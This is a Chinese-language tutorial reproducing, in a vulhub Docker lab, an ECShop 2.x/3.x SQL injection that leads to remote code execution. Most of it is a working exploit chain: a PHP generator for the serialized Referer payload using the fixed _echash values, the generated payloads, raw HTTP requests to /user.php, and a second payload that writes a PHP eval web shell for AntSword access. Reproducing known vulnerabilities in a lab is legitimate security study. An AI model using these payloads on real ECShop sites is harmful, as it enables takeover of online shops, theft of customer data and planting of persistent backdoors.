（三）vulhub专栏：Ecshop Sql注入、远程代码执行漏洞复现

启动靶场

在终端里进入事先进入准备好的vulhub靶场目录下，

cd vulhub-master/ecshop/xianzhi-2017-02-82239600
sudo docker-compose up -d
1
2

执行命令后

Ecshop2.x:

可在浏览器中输入http://ip:8080，正常访问即为靶场启动成功。

Ecshop3.x:

可在浏览器中输入http://ip:8081，正常访问即为靶场启动成功。

然后分别进行安装即可，数据库地址为mysql，用户名密码均为root

漏洞发现

漏洞成因

1. Referer值未做任何验证可被控制直接引用
2. 采用_echash做分割，且为定值：2.x：554fcae493e564ee0dc75bdf2ebf94ca、3.x：45ea207d7a2b68c49582d2d22adf953a
3. insert_ads函数的sql拼接不规范导致sql注入
4. make_val函数拼接字符串，拼接用户输入内容。

经由以上四个步骤即可造成远程代码执行，具体分析可参考文章

漏洞利用

手搓

知道原理后我们就开始利用漏洞了，环境如下：

靶机：192.168.75.146

攻击机：192.168.75.144

首先需要准备准备POC，代码如下：

<?php
$shell = bin2hex("{\$asd'];phpinfo\t();//}xxx");
$id = "-1' UNION/*";
$arr = [
    "num" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),
    "id" => $id
];

$s = serialize($arr);

$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';

echo "POC for ECShop 2.x: \n";
echo "{$hash2}ads|{$s}{$hash2}";
echo "\n\nPOC for ECShop 3.x: \n";
echo "{$hash3}ads|{$s}{$hash3}";
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

使用php执行上述代码，生成POC：

POC for ECShop 2.x:
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca

POC for ECShop 3.x:
45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a
1
2
3
4
5

Ecshop2.x POC利用：

在burp中抓包Ecshop用户登录页面，发送到重放器Repeater里，然后将请求信息替换成下方的POC：

GET /user.php HTTP/1.1
Host: [目标IP]
Referer: [生成的POC]
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 1
1
2
3
4
5
6
7

发送后即可得到如下结果，证明漏洞利用成功。

Ecshop3.x POC利用：

在burp中抓包Ecshop用户登录页面，发送到重放器Repeater里，然后将请求信息替换成下方的POC：

GET /user.php HTTP/1.1
Host: [目标IP]
Referer: [生成的POC]
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 1
1
2
3
4
5
6
7

发送后即可得到如下结果，证明漏洞利用成功。

Get WebShell

生成获取WebShell的POC，代码如下：

<?php
$shell = bin2hex("{\$asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ2V2YWwucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7ID8+Jyk='));//}xxx");
$id = "-1' UNION/*";
$arr = [
    "num" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),
    "id" => $id
];

$s = serialize($arr);

$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';

echo "POC for ECShop 2.x: \n";
echo "{$hash2}ads|{$s}{$hash2}";
echo "\n\nPOC for ECShop 3.x: \n";
echo "{$hash3}ads|{$s}{$hash3}";
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

// 原型

file_put_contents(‘eval.php’,‘<?php eval($_POST[cmd]); ?>’)

// base64编码

ZmlsZV9wdXRfY29udGVudHMoJ2V2YWwucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7ID8+Jyk=

生成的Get WebShell Poc如下：

POC for ECShop 2.x:
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:297:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a32563259577775634768774a79776e50443977614841675a585a686243676b58314250553152625932316b58536b374944382b4a796b3d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca

POC for ECShop 3.x:
45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:297:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a32563259577775634768774a79776e50443977614841675a585a686243676b58314250553152625932316b58536b374944382b4a796b3d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a
1
2
3
4
5

套入POC利用，再用蚁剑即可连接，连接截图如下：

到此，Ecshop Sql注入、远程代码执行漏洞复现结束。